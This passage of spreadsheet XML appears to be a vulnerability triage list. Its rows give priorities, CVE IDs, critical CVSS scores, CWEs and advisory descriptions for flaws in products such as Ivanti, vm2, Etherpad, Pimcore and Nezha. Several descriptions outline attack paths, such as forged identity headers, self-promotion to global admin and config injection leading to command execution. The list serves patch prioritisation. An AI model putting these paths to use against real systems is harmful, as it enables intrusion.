        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12650</t>
        </is>
      </c>
      <c r="C49" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19232</t>
        </is>
      </c>
      <c r="C50" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19583</t>
        </is>
      </c>
      <c r="C51" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>Velociraptor allows some sensitive artifacts to be gated by additional permissions. For example, the Linux.Sys.BashShell artifact allows arbitrary command execution on endpoints, and so it requires the EXECVE permission to schedule. However, no such check was implemented for client monitoring artifacts. Additionally there was no requirement that client monitoring artifacts carry the CLIENT_EVENTS type. This allows any user who can schedule client monitoring artifacts to also schedule otherwise restricted artifacts (such as Linux.Sys.BashShell).</t>
        </is>
      </c>
      <c r="M51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19583</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22797</t>
        </is>
      </c>
      <c r="C52" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr">
        <is>
          <t>2026-01-19</t>
        </is>
      </c>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected.</t>
        </is>
      </c>
      <c r="M52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22797</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="C53" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G53" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="M53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47686</t>
        </is>
      </c>
      <c r="C54" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G54" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, handleException() in lib/setup-sandbox.js sanitizes SuppressedError.error, SuppressedError.suppressed, and AggregateError.errors but does not sanitize Error.cause, allowing sandbox code to obtain a powerful host object such as process from an embedder-exposed host function that throws an error with that object as its cause and then execute arbitrary host commands. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47686</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48086</t>
        </is>
      </c>
      <c r="C55" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, a TENANT_ADMIN promotes themselves to platform-wide GLOBAL_ADMIN through a single PUT request. The role-update handler accepts the `GLOBAL_ADMIN` enum value from any tenant admin updating their own tenant's staff. No policy check enforces that "only an existing GLOBAL_ADMIN may grant GLOBAL_ADMIN", so the schema validation IS the authorization decision. After re-login, the JWT contains the new role and the formerly-tenant-scoped admin reaches every other tenant on the platform. On the hosted OpenReception service this is a scope-changed escalation: a single customer-side tenant administrator gains full platform-wide administrative control over all other tenants' configuration, users, staff records, operational metadata, and tenant lifecycle. Plaintext appointment contents remain subject to the E2E model unless chained with the staff-crypto poisoning issue (V-4) or with staff-passkey hijacking (V-1). On a single-tenant self-hosted deployment it is still a privilege escalation because TENANT_ADMIN should not be able to create new tenants, modify global configuration, or manage other administrators. The same handler also accepts updates targeted at any colleague within the tenant. A tenant admin can promote a separate collaborator account instead of themselves, leaving their own audit trail clean while the platform-wide breach happens through a separate identity. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48086</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48273</t>
        </is>
      </c>
      <c r="C56" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48765</t>
        </is>
      </c>
      <c r="C57" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 allow a low-privilege read collaborator to extract a workspace OAuth `credentialsId` from a readable bot configuration and then overwrite that credential through `handleUpdateOAuthCredentials()` by supplying an attacker-controlled writable `workspaceId`. The update path validates only the attacker-supplied workspace and then updates the credential record by global `id` alone, while also rewriting the credential's `workspaceId`. This allows cross-workspace OAuth credential takeover and reassignment. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48765</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51366</t>
        </is>
      </c>
      <c r="C58" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in Bottinelli Informatica Vedo Suite v.1.2.5 allows a remote attacker to execute arbitrary code via the api_vedo/chat endpoint and the utente_chat parameter</t>
        </is>
      </c>
      <c r="M58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51366</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52855</t>
        </is>
      </c>
      <c r="C59" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G59" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to 1.12.3, {{config.}} placeholders in egg configuration-file templates allow a low-privileged user to read {{config.token}}, {{config.token_id}}, and {{config.docker.registries}} from the full daemon configuration. This issue is fixed in version 1.12.3.</t>
        </is>
      </c>
      <c r="M59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52855</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54680</t>
        </is>
      </c>
      <c r="C60" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G60" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr">
        <is>
          <t>2026-07-29</t>
        </is>
      </c>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>Logging operator automates the deployment and configuration of Kubernetes logging pipelines. Prior to 6.6.0, the Fluentd configuration renderer FluentRender in pkg/sdk/logging/model/render/fluent.go writes CRD strings such as Flow record_transformer.records values directly into fluent.conf without escaping, allowing a user who can create Flow resources to inject a Fluentd &lt;match **&gt; block using @type exec and execute arbitrary commands inside the Fluentd aggregator. This issue is fixed in version 6.6.0.</t>
        </is>
      </c>
      <c r="M60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54680</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55089</t>
        </is>
      </c>
      <c r="C61" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. From 2.1.0 until 3.1.0, Etherpad's src/node/handler/APIHandler.ts authorizes requests to /api/2/* in the authorization_code OAuth path by using requiredClaims with the admin claim. This check requires only that the claim exists, while src/node/security/OAuth2Provider.ts issues admin: false for configured non-admin users. A non-admin user with a valid signed token can therefore invoke administrative functions including setHTML, setText, appendText, deletePad, copyPad, movePad, restoreRevision, anonymizeAuthor, listAllPads, and listAuthorsOfPad, allowing disclosure, modification, or deletion of pads across the instance. This issue is fixed in version 3.1.0.</t>
        </is>
      </c>
      <c r="M61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55089</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55166</t>
        </is>
      </c>
      <c r="C62" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639, CWE-918</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.2, authenticated users could influence an ACME authority acme_url without an effective server-side destination restriction and trigger AcmeHandler.setup_acme_client to make backend requests. An attacker could target cloud instance metadata or internal services from Lemur network context, potentially obtaining credentials available to the host. The advisory also identifies creator-equality authorization behavior that could preserve access to certificate key material after ownership or role changes, with insufficient export_private_key audit context to distinguish that access path. Together, the acme_url server-side request forgery and authorization weakness could expose cloud credentials and long-lived PKI private-key access. The fix adds ACME_DIRECTORY_HOST_ALLOWLIST validation and enriches key-export audit events with creator and current-owner context. This issue is fixed in version 1.9.2.</t>
        </is>
      </c>
      <c r="M62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55166</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55565</t>
        </is>
      </c>
      <c r="C63" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G63" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs LikeExpression.fillCode_getValueReturn in yamcs-core/src/main/java/org/yamcs/yarch/streamsql/LikeExpression.java inserts an unescaped LIKE pattern into Java source compiled by Expression.getCompiledExpression through SimpleCompiler.cook instead of applying ValueExpression.escapeJavaString. The pattern can originate from POST /api/archive/{instance}:executeSql, POST /api/archive/{instance}:streamSql, POST /api/archive/{instance}/tables/{table}:readRows, GET /api/archive/{instance}/events, or activity searches, including paths available with ReadTables, ReadEvents, or ReadActivities. A quote in the pattern can inject Java that runs as the Yamcs server process. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55565</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55634</t>
        </is>
      </c>
      <c r="C64" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-94</t>
        </is>
      </c>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, the class-definition import endpoint /pimcore-studio/api/class/definition/configuration-view/detail/{id}/import accepts a DataObject field name that is emitted without an identifier allowlist by lib/DataObject/ClassBuilder/FieldDefinitionPropertiesBuilder.php into generated PHP properties and by models/DataObject/ClassDefinition/Helper/Dao.php into ALTER TABLE identifiers. An authenticated user with the objects permission can inject PHP syntax into the generated DataObject class, causing attacker-controlled code in generated var/classes/DataObject/.php files to run when an object of that class is instantiated, and can also inject SQL identifier content into schema-changing statements. The central models/DataObject/ClassDefinition/Data.php::setName() validation did not reject semicolons, braces, backticks, spaces, or other non-identifier characters. This issue is fixed in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="M64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55634</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62283</t>
        </is>
      </c>
      <c r="C65" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&amp;M tool. Nezha versions 1.14.13 through 1.14.14 and 2.0.0 through 2.0.9 do not bind stream identifiers created by CreateStream in service/rpc/io_stream.go to their creating user, and `GET /ws/terminal/:id` and `GET /ws/file/:id` only check whether the supplied UUID exists. An authenticated RoleMember who obtains a live stream UUID from logs, browser history, referer data, or telemetry can attach to another user's terminal or file-manager session, read and write target-server files, and execute shell commands. This issue is fixed in version 2.0.10.</t>
        </is>
      </c>
      <c r="M65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62283</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65818</t>
        </is>
      </c>
      <c r="C66" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G66" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H66" s="5" t="inlineStr">
        <is>
          <t>microsoft:power_platform</t>
        </is>
      </c>
      <c r="I66" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Power Automate allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65818</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65974</t>
        </is>
      </c>
      <c r="C67" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.111.0 and 16.22.0, limited authenticated users can cross a permission boundary in Frappe safe execution because frappe.render_template is exposed without forcing restrict_globals, allowing server-side template injection and remote code execution. This issue is fixed in versions 15.111.0 and 16.22.0.</t>
        </is>
      </c>
      <c r="M67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65974</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66795</t>
        </is>
      </c>
      <c r="C68" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr">
        <is>
